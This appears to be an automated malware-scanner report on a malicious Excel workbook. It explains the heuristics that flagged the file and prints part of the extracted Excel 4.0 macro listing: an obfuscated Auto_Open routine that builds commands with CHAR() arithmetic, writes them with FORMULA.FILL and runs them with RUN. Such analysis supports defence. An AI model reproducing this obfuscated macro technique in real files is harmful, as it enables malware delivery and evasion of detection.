MALICIOUS
Risk Score: 140

Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro that uses dangerous functions such as FORMULA.FILL and RUN. This indicates the macro is designed to execute arbitrary commands, likely to download and execute a second-stage payload. In the recovered listing, FORMULA.FILL assembles a string from CHAR() calls over arithmetic on other cells (which hides the real formula from static string matching) and writes it into a target cell, which RUN then executes; the functions used therefore indicate a capability for arbitrary code execution.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126368 bytes |

SHA-256: fec3e0cc333456308248b9bf839af4c265edb7689796b85747e375c5a9cd1457
Preview script: first 1,000 lines of the extracted script
```text
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet
' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!JP56538
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Sheet,ET27,"",-387.00000000000000000000
' Sheet,DI60,"",0.11489898989898990334
' Sheet,DX80,"",-6.65853658536585335526
' Sheet,HM89,"",-1233.00000000000000000000
' Sheet,CM135,"",0.06691919191919191989
' Sheet,HI136,"FORMULA.FILL(CHAR(IX23620+HJ21030)&CHAR(GW8191/EP31778)&CHAR(GW8191/Z15383)&CHAR(ES57153-F28575)&CHAR(FD23243*BA24624)&CHAR(FJ38391-HW40705)&CHAR(FJ38391/GH18825)&CHAR(FH56526*M21719)&CHAR(IX23620*EK45308)&CHAR(IQ8401-FO64536)&CHAR(FA19183*DQ5744)&CHAR(FD23243/GU65340)&CHAR(FJ38391+HE32401)&CHAR(GW8191-DH58173)&CHAR(HV50424-BC53248)&CHAR(FA19183/D6996)&CHAR(FJ38391*FQ12443)&CHAR(FA19183-E55930)&CHAR(FH56526/JS29981)&CHAR(HF61404/HU60974)&CHAR(IX23620/CL39643)&CHAR(FD23243/DK3762)&CHAR(FH56526*DS4617)&CHAR(HV50424-BG63175)&CHAR(IX23620/DX60757)&CHAR(IQ8401-FC12701)&CHAR(GW8191-FT56026)&CHAR(HV50424/HU29721)&CHAR(GW8191+CH3577)&CHAR(IQ8401*FH55986)&CHAR(HF61404-FN10223)&CHAR(GW8191/CU58195)&CHAR(IX23620*HK57622)&CHAR(HF61404-J33493)&CHAR(FH56526/CF31678)&CHAR(HV50424*JC2567)&CHAR(FH56526/CP23600)&CHAR(HV50424*T50483)&CHAR(ES57153+BM38241)&CHAR(HV50424*A35410)&CHAR(FA19183+CD19846)&CHAR(FJ38391*HY46334)&CHAR(FD23243+J8921)&CHAR(FA19183+DC14606)&CHAR(HF61404/DJ11039)&CHAR(FD23243*JN52331)&CHAR(FD23243+D35747)&CHAR(IQ8401+EW47866)&CHAR(ES57153*DU15292)&CHAR(HV50424/CZ47707)&CHAR(FA19183/DI41272)&CHAR(HF61404*CB42660)&CHAR(FJ38391+HP52268)&CHAR(HV50424+IW57930)&CHAR(FJ38391/BI32942)&CHAR(GW8191+FX46326)&CHAR(HF61404+HS43283)&CHAR(FA19183*JT58041)&CHAR(GW8191*FP52849)&CHAR(HF61404-EQ36902)&CHAR(HV50424+EA4870)&CHAR(HF61404+FV64571)&CHAR(GW8191*FB742)&CHAR(FA19183+A47713)&CHAR(FA19183/GM9925)&CHAR(FA19183*CG27558)&CHAR(IQ8401-FE21407)&CHAR(HF61404/R49595)&CHAR(FD23243*HH62258)&CHAR(IQ8401*IH50125)&CHAR(FH56526+CH6448)&CHAR(IQ8401+HY65217)&CHAR(HV50424+FB10005),IO51666)",""
' Sheet,HI137,RUN(HY31532),""
' Sheet,DD179,"",-0.82500061035156246891
' Sheet,EO193,"",15.84000976562500007105
' Sheet,P257,"",-351.00000000000000000000
' Sheet,JF259,"",-0.59420289855072461194
' Sheet,HS297,"",-8.19512195121951236843
' Sheet,EA340,"",429.00000000000000000000
' Sheet,DG365,"",-0.26737967914438504069
' Sheet,L395,"",-133.00000000000000000000
' Sheet,CA399,"",-0.46524064171122997413
' Sheet,IP532,"",129.00000000000000000000
' Sheet,CZ548,"",-187.00000000000000000000
' Sheet,FX566,"",0.57647158823529409677
' Sheet,GT581,"",0.22982456140350876472
' Sheet,FJ584,"",-749.00000000000000000000
' Sheet,IZ655,"",1244.00000000000000000000
' Sheet,EA684,"",-738.00000000000000000000
' Sheet,DP693,"",-429.00000000000000000000
' Sheet,CO707,"",4.54166666666666696273
' Sheet,FH717,"",-243.00000000000000000000
' Sheet,U741,"",-2.14942528735632176762
' Sheet,FB742,"",-0.50000000000000000000
' Sheet,BN803,"",0.14526315789473684403
' Sheet,GS938,"",228.50000000000000000000
' Sheet,HZ1006,"",-5.35294117647058786957
' Sheet,HI1019,"FORMULA.FILL(CHAR(HF61404-IN43212)&CHAR(FA19183+HC27342)&CHAR(IQ8401*JI14429)&CHAR(FA19183-P33044)&CHAR(IX23620*BE27894)&CHAR(GW8191*HN30973)&CHAR(FA19183/L15384)&CHAR(IQ8401*DD13291)&CHAR(FH56526+HA52672)&CHAR(ES57153+IO29564)&CHAR(HV50424+DA34052)&CHAR(GW8191/V36501)&CHAR(FH56526-GJ12094)&CHAR(FJ38391+BP40233)&CHAR(HF61404/BZ46635)&CHAR(FA19183*HQ49313)&CHAR(HF61404*HE34848)&CHAR(ES57153*BV62862)&CHAR(HF61404+EM24181)&CHAR(FD23243+GA30501)&CHAR(IX23620-HO10294)&CHAR(IX23620+JR46763)&CHAR(HF61404*IN6118)&CHAR(IX23620+CV23444)&CHAR(FA19183+GC22906)&CHAR(FJ38391/EV37055)&CHAR(FA19183-N32578)&CHAR(GW8191/JA28359)&CHAR(FA19183-FM15564)&CHAR(FA19183+BV9113)&CHAR(FH56526/HB4470)&CHAR(IX23620-EM53088)&CHAR(IQ8401+JU4 ... (truncated)
```